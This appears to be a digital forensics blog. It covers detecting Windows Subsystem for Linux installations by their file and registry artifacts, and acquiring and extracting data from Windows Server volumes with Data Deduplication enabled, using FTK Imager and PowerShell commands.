My preferred method is to host the Canonical image on a temporary internal web server, intercept the request made by lxrun to Microsoft's servers with Fiddler and redirect it to the downloaded version. Instructions are provided here.

Whichever method you use, once installed a new "Bash on Ubuntu on Windows" shortcut will be added to the start menu. You can access Bash by clicking the shortcut or by running the 'bash' command from a command prompt. When you first launch Bash you will be prompted to create a UNIX user account. 

Detecting Windows Subsystem for Linux (BETA)

Note these locations relate to the Beta version of WSL. Installations via the Windows Store are now located within the associated App install folder.

Enabling Windows Subsystem for Linux and installing one of the available userland offerings causes a huge number of changes to a system, and there are a number of things you can look out for to confirm its installation. The simplest indicator of WSL being installed for at least one user is the presence of the Bash executable at:


i.e. 'C:\Windows\System32\bash.exe'

Additionally, the installation of 'Bash on Ubuntu on Windows' results in the creation of a 'HKLM\COMPONENTS\CanonicalData' key, as well as a huge number of other keys associated with enabling WSL, enabling developer mode and installing Bash. I have focused on Ubuntu in this post because at the time of writing it is the default userland and installation of alternatives requires membership of the Windows Insider program (or a manual unsupported installation). As other userland offerings reach general release we will start to see them in the wild more often, although I anticipate Ubuntu will remain dominant for some time.

It should be noted that installation of WSL is on a per-user basis; this is of particular importance as we look to forensically interesting artifacts. On a multi-user system each Windows user has to install Bash independently, the associated filesystem is stored within the user's %localappdata% location and notable registry keys are stored within their NTUSER.DAT. Consequently, on disk you can also look out for the presence of the Linux filesystem (for each individual user) located at:


i.e. 'C:\Users\[Username]\AppData\Local\Lxss\rootfs'.
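On a live system, or an image mounted with a drive letter, a quick way to sweep all user profiles for a WSL filesystem is something along these lines (a sketch; adjust the drive letter to suit your mount point):

Get-Item 'C:\Users\*\AppData\Local\Lxss\rootfs' -ErrorAction SilentlyContinue

Each path returned identifies a Windows user who has installed Bash via the Beta method.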

In addition to checking for the presence of the Bash executable or the 'Lxss\rootfs' directory, the existence of the following registry key within an individual user's NTUSER.DAT indicates that Bash is installed and configured for that user:


We will revisit this key and its contents when we look at forensically interesting artifacts in my next post.


Forensic Analysis of volumes with Data Deduplication Enabled

In this post I hope to outline a number of options available to analysts when performing forensic analysis of Microsoft Windows servers that have the "Data Deduplication" feature enabled. If you are unfamiliar with the Data Deduplication feature and want additional detail on it and its impact on forensic investigations, see my last post.

The first half of this post addresses acquiring volumes which you know have Data Deduplication enabled. However, if you already have a disk image and are looking to extract the data after the fact, you can jump to the 'Handling images containing deduplicated data' section below.

Acquiring Volumes where you know Data Deduplication is enabled

If you happen to know in advance that the volume you wish to acquire has Data Deduplication enabled then you may be in a position to modify your acquisition approach.

As with any acquisition, the most appropriate methodology is going to depend on the reason for the acquisition as well as any local policies or legal constraints. I would always suggest best practice dictates that a full physical disk image (or volume image) be your starting point, and the presence of Data Deduplication doesn't change that.

Coming into this exercise I had a vague hope that performing a live acquisition of the logical volume might circumvent the issue of Data Deduplication, much like it circumvents the issues with many varieties of Full Disk Encryption (FDE). However, as soon as I started to look under the hood I immediately saw why that isn't the case, not least because it is possible to store more deduplicated data within a volume than would fit were the data in its duplicated form.

If you are presented with Data Deduplication then the most forensically sound method to acquire the data is to perform a full disk image in the usual manner, or capture a copy of the VMDKs/VHDs for virtual servers per your usual methodology, and then to extract/rehydrate the data after the fact. The key caveat is that this requires you to be in a position to spin up a Windows Server 2012/2016 box (with the associated licensing constraints). Alternatively, it may be possible to access the data after the fact if you are able to virtualise a copy of the server you have acquired, perhaps via tools such as Live View or Forensic Explorer.

If you aren't able to perform any of the above then I would still recommend capturing a full image as a starting point. While you might not be able to take the best-practice approach at this stage, you never know when this might change, who you may be required to provide evidence to, or what their capabilities may be. Once you have secured your best-evidence copy, it may be worth capturing key data via an active file collection method, such as FTK Imager's "Contents of a Folder" option to AD1 or using EnCase to create an L01, while you have access to the original live system.


Unoptimization is the process of reversing Data Deduplication for a particular volume and returning it to a duplicated state, rehydrating the individual files and replacing the reparse points with those files. This may seem like an appealing option when acquisition of a volume with Data Deduplication enabled is required, i.e. unoptimize the volume prior to commencing the acquisition, but there are significant implications associated with this approach.

Firstly, it may not be possible to unoptimize a volume. Noting that the feature exists specifically to facilitate the storage of more data on a volume than could be stored in its original duplicated form, if the volume contains a significant quantity of duplicate data, or if it is nearing capacity, it will not be possible to reverse the deduplication due to a lack of space on the volume.

The implication of greatest concern to forensic practitioners is the fact that unoptimizing a volume will overwrite space that was otherwise unallocated, and may have contained useful deleted data. Nevertheless, it may seem appealing to capture a forensic image of the volume to preserve that recoverable data, then to unoptimize the volume and capture a second image. Certainly, assuming the volume has adequate space to be unoptimized, that is an option which would satisfy the goal of getting access to all available data in a relatively convenient manner.

If you already have an image and still want to unoptimize the source drive, there are further implications to be considered. These will be of varying significance depending on the system in question and the circumstances surrounding the requirement for the acquisition, but they include:

  • A significant length of time will be required to perform the acquisition. Capturing an image, unoptimizing a potentially large volume and capturing a second image is going to take a long time. That's more time at the controls, more time inconveniencing the system owner and more time for something to go wrong with a live, potentially business-critical system.
  • The unoptimization process has a system impact. Usually optimization happens on a few files at a time, on a scheduled basis, balanced against system load. If you manually initiate a full unoptimization it will have a significant impact on IO and RAM usage. Depending on the function of, and load on, the server this may not be acceptable.
  • Risk. Significant operations like disk imaging always carry some risk that an error occurs and system failure results. The same goes for unoptimization; as far as I am concerned it introduces unnecessary risk which is avoidable via the method outlined in this post.

In case the above diatribe didn’t make it clear, I really do not recommend performing unoptimization on a source device to facilitate an acquisition, but I appreciate it may be the only option in some circumstances. Maybe.

With that said, reviewing the output from the PowerShell command Get-DedupStatus will provide an indication as to whether unoptimization is possible.
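For example, the relevant figures can be pulled out side by side (property names per the DedupStatus object) with:

Get-DedupStatus | Format-List Volume, FreeSpace, SavedSpace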

If the SavedSpace exceeds the FreeSpace then the drive cannot be fully unoptimized. Assuming the volume can be unoptimized, the following PowerShell command will initiate the process (replacing [volume] with the letter of the volume you wish to unoptimize):

Start-DedupJob [volume] -Type Unoptimization

This command will unoptimize the data on the volume and then disable Data Deduplication for that volume. The status of the drive can then be checked with:

Get-DedupStatus

If running Get-DedupStatus returns to the command prompt without other output, per the screenshot below, then there are no longer any optimized volumes.

Once the job has completed and the volume is no longer optimized, you can acquire it as you would any other disk/volume image. Thereafter, the appropriate command or steps to reoptimize the drive back to its original state will depend on how it was initially configured. You can defer to the system owner/administrator for this information (and really I hope you engaged with them before you even considered unoptimizing volumes on their server).
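If the volume was configured with the default settings, re-enabling and reoptimizing should look something like the following (a sketch assuming the default usage type; confirm the original configuration with the administrator first):

Enable-DedupVolume -Volume [volume] -UsageType Default
Start-DedupJob [volume] -Type Optimization

The progress of any running deduplication job, optimization or otherwise, can be monitored with Get-DedupJob.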

Handling images containing deduplicated data

If your only option is to capture a dead disk image, or you have captured an image unaware that the volume had Data Deduplication enabled, then you will have to extract the data after the fact. In most instances this would be my recommended approach anyway, i.e. capture a regular disk image and perform post-processing later. As alluded to above, I have not identified a method to reverse Data Deduplication, or to extract the data, which does not require access to a system running Server 2012 or Server 2016.

Mounting within virtual or physical server

The first point to note is that Data Deduplication in Server 2012 and Server 2016 is not fully interchangeable. A deduplicated volume created in Server 2016 cannot be accessed by Server 2012. However, it does appear to be backwards compatible: drives created in Server 2012 can be read by Server 2016.

Whether you have a logical volume image, a physical disk image or a flat VMDK/VHD from ESXi or Hyper-V, my preferred method to access them is via the "Image Mounting" feature of FTK Imager. In the below instructions I will detail the process to access the drive from a Windows Server 2016 Standard install however the process for Server 2012 is essentially identical (assuming the drive you are attempting to access was created using Server 2012).

1. Install Server 2016
If you have a valid Server 2016 license or access to an MSDN subscription then you can acquire the ISO from those sources. I'll also point out that Microsoft make evaluation copies of both Server 2016 and Server 2012 available for 180-day evaluations. These can be accessed here; however, whether this is a legitimate use per the evaluation license agreement is for you to decide or seek advice on, IANAL.

Whether you are using physical hardware or a Type 1/Type 2 hypervisor, the install process is essentially the same. Install the OS and, when prompted, select Windows Server 2016 Standard (Desktop Experience); the 'Desktop Experience' is required to use FTK Imager to mount drives (unless I am mistaken, I don't believe this can be achieved on the command line) and makes testing files easier. If you find you have accidentally installed Server 2016 Core (without the GUI), as *may* have happened to me more than once during testing, then the below instructions may prove helpful:

Installing the GUI for Server 2016
Installing the GUI for Server 2012

2. Mount the volume containing deduplicated data using FTK Imager
Once you have logged into your newly created Server 2016 analysis machine you can mount the drive in the manner of your choosing. I will detail the method using FTK Imager Lite, however Mount Image Pro or OSFMount will work equally well.

FTK Imager Lite is sufficient for our purposes, and can be downloaded from the Access Data website here.

Once launched, the Mount Image to Drive window can be accessed by selecting File > Image Mounting or by clicking the Image Mounting icon in the toolbar.

FTK Imager Image Mounting Icon

Populate the "Image File:" field with the path to your image/VMDK/VHD file, or browse to where it is located by clicking the button labelled '...'. Whether you are mounting a full physical image, a logical volume image or a VHD etc., the remaining fields will be populated automatically. In this instance the default settings will suffice, so you can go ahead and select Mount.

Mount Image to Drive window

The Mapped Image list will now populate with the drive letters assigned to the partition(s) within the image file. Take a note of the drive letter which has been assigned to the volume you are interested in and select Close.

Image Mounted with FTK Imager Lite

Within Windows Explorer you will now be able to browse the mounted image; however, deduplicated data will still be inaccessible. This is because Data Deduplication is not installed by default on a fresh install of Server 2012 or 2016.

3. Install Data Deduplication
The Data Deduplication feature can be installed via PowerShell with ease; however, GUI instructions follow if preferred.

To install the feature, launch a PowerShell console and type:

Install-WindowsFeature -Name FS-Data-Deduplication

Hit Enter to execute the command and the Data Deduplication feature will install; no restart is required. Thereafter you can revisit the mounted volume and you will note that the previously inaccessible files can now be accessed.
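To confirm the feature installed correctly you can check its install state with:

Get-WindowsFeature -Name FS-Data-Deduplication

The Install State column should read Installed.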

If you prefer to do this without having to deal with PowerShell this can be achieved using the Add Roles and Features Wizard.

Launch Server Manager, select Local Server and scroll down until you see Roles and Features:

Roles and Features within Server Manager

Clicking the Tasks button will bring up a dropdown menu where you can select Add Roles and Features:

Add Roles and Features in Tasks drop down

Select Next to skip past 'Before you Begin', then again to retain the default installation type of "Role-based or feature-based installation", and a third time to keep the default server selection, your new local server.

Under Server Roles > File and Storage Services > File and iSCSI Services you will find the checkbox for Data Deduplication.

Select the Data Deduplication checkbox to add the feature and you will receive a notification, per the below screenshot, that the 'File Server' feature requires installing as it is a dependency:

Add Roles and Features Wizard warning

Select Add Features

Select Next

Select Install

The Data Deduplication feature will now install and no restart will be required. Thereafter you can revisit the mounted volume and you will note that the previously inaccessible files can now be accessed.

4. Acquire data
If you do not need to acquire the data, but rather to perform processing and parsing activities, you can stop here. The mounted drive can be used for AV scans, Bulk Extractor runs etc., as long as the process you wish to undertake performs Physical Name Querying to access the active files.

If, however, you need to acquire copies of the files for analysis in forensic tools, or to process them by some other means, then you may wish to capture a logical acquisition of the files into an AD1 or similar. Once again FTK Imager Lite is sufficient for our purposes, and the steps are outlined below:

If FTK Imager was used to mount the drive then it should still be running. If not then launch FTK Imager.

Once launched, the process to acquire the active files to a logical container is to select File > Create Disk Image or to click the 'Create Disk Image' icon in the Toolbar.

Create Disk Image Icon

Select the Contents of a Folder evidence type. You will likely get a warning message, which you can ignore; select Yes to continue.

Select Browse and navigate to the root of the mounted drive, remembering the drive letter assigned when we mounted the volume. Per the below screenshot this is 'H:\'. Note: if you only wish to perform a targeted collection of a limited number of files, a more direct path can be entered or browsed to.

Select Finish

Within the 'Create Image' window, select Add...

Populate the case information as you require and select Next >

This will bring you to the 'Select Image Destination' Dialog box where you can Enter or Browse to a destination path for your AD1 (USB media or network location recommended).

The other settings can be left at default, select Finish and you will return to the Create Image Dialog window.

Select Start to initiate the logical acquisition. Once complete you will have an AD1 container which contains logical copies of the active files with their metadata preserved. Make sure to check the log for errors. If you attempt to perform a logical acquisition without enabling Data Deduplication, or from a system which does not support dedupe, the job will fail and the error log will look as below, showing that the files could not be accessed:

FTK Image Summary with errors

Other Options

The above methodology is my preferred approach when accessing volumes with Data Deduplication enabled, however minor modifications to the methodology may suit others better. Some modifications to consider include:

Presenting the VMDK or VHD to a Virtual server as a read only device.
If your source evidence is provided as a virtual disk then an alternative to mounting the image with software is to attach the disk to your virtual Server 2016/2012 instance via the hypervisor. This may provide a performance improvement but is slightly more involved than using FTK Imager (or similar). There is also a risk of accidentally adding the device as read/write, so this should never be performed on original evidence.

Virtualise the source server
Personally, I have limited experience in virtualising images for review; it used to be an occasional requirement when attempting to access proprietary finance systems for insolvency matters. The last time I did this was some years ago, when Live View was king, and no doubt things have moved on. Some forensics shops appear to use image virtualisation heavily, and this technique may be useful in handling Data Deduplication where access to a legitimate Windows Server 2012/2016 license is not feasible. Booting a copy of the original imaged server and then using it to review or acquire a logical copy of the data contained in a deduplicated volume should work in theory.

Hopefully the above is useful to anyone who finds themselves up against the same issue. If you got this far and it's been helpful, please let me know by leaving a comment or firing me a tweet. Comments, criticism and corrections are all welcome too.